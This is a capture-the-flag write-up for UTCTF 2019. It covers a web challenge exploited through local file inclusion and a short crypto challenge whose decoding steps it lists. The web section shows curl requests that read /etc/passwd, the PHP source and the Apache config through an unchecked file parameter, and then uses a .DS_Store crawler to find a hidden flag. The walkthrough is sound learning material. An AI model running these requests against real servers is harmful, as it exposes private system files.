CTF
Name : UTCTF 2019
Website : isss.io
Type : Online
Format : Jeopardy
CTF Time : link
650 - HabbyDabby's Secret Stash - Web
HabbyDabby's hidden some stuff away on his web server that he created and wrote from scratch on his Mac. See if you can find out what he's hidden and where he's hidden it!
http://a.goodsecurity.fail/
by copperstick6
< html >
< head >
< meta charset = "utf-8" >
< meta http-equiv = "X-UA-Compatible" content = "IE=edge,chrome=1" >
< title >Locked Away</ title >
< meta name = "description" content = "" >
< meta name = "viewport" content = "width=device-width, initial-scale=1" >
</ head >
< style >
body {
background-color: #62C2C5 ;
}
</ style >
< body >
< h1 >Welcome to HabbyDabby's Secret Stash</ h1 >
< h2 >You'll never get our secrets!</ h2 >
< div style = "visibility: hidden; display:inline;" >
< form method = "get" >
< select name = "file" >
< option value = "english.html" >English</ option >
< option value = "french.html" >French</ option >
</ select >
< input type = "submit" >
</ form >
</ div >
</ body >
</ html >
So there is an hidden form. We can call http://a.goodsecurity.fail/?file=english.html for example, telling us You'll never get our secrets! .
That sounds like an LFI (Local File Inclusion).
$ curl http://a.goodsecurity.fail/?file=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
Let's see the source code curl 'http://a.goodsecurity.fail/?file=index.php'
:
< ? php
if ( isset ( $_GET [ 'file' ] ) ) {
$file = $_GET [ 'file' ];
if ( !file_exists ( $file ) ) die ( "File not found" );
if ( $file === "english.html" || $file === "french.html" ){
echo file_get_contents ( $_GET [ 'file' ] );
}
else {
// Force the download
header ( "Content-Disposition: attachment; filename=" . basename ( $file ));
header ( "Content-Length: " . filesize ( $file ));
header ( "Content-Type: application/octet-stream;" );
readfile ( $file );
}
}
else {
echo file_get_contents ( "index.html" );
}
? >
At least there is nothing unusual, all seems to be default files for a Debian 9:
curl 'http://a.goodsecurity.fail/?file=/etc/apache2/sites-enabled/000-default.conf'
<VirtualHost *:80>
ServerAdmin contact@isss.io
ServerName localhost
DocumentRoot /var/www/site
<Directory /var/www/site/>
Options Indexes FollowSymLinks MultiViews
AllowOverride All
Order deny,allow
Allow from all
</Directory>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
The description is talking about MAC so I thought about __MACOSX
and .DS_Store
.
curl 'http://a.goodsecurity.fail/?file=.DS_Store' --output output
Let's try with the excellent tool: ds_store_exp , it parses .DS_Store
file and download files recursively:
$ python2 ds_store_exp/ds_store_exp.py 'http://a.goodsecurity.fail/.DS_Store'
[+] http://a.goodsecurity.fail/.DS_Store
[+] http://a.goodsecurity.fail/e/.DS_Store
[+] http://a.goodsecurity.fail/index.html
[+] http://a.goodsecurity.fail/a
[+] http://a.goodsecurity.fail/e/d/.DS_Store
[+] http://a.goodsecurity.fail/e/d/e/.DS_Store
[+] http://a.goodsecurity.fail/e/d/e/flag.txt
$ curl http://a.goodsecurity.fail/e/d/e/flag.txt
utflag{mac_os_hidden_files_are_stupid}
200 - [basics] crypto - Crypto
Can you make sense of this file?
by balex
TL;DR :
Binary to ascii
Base64 decode
Caesar cipher with a 10
shift
Alphabetical substitution
You can use https://cryptii.com/ or CLI.
utflag{3ncrypt10n_15_c00l}
The hardest part is to get the scoreboard alive to submit the flag.
Note: 0% real life but it is a starter challenge so I guess it is ok.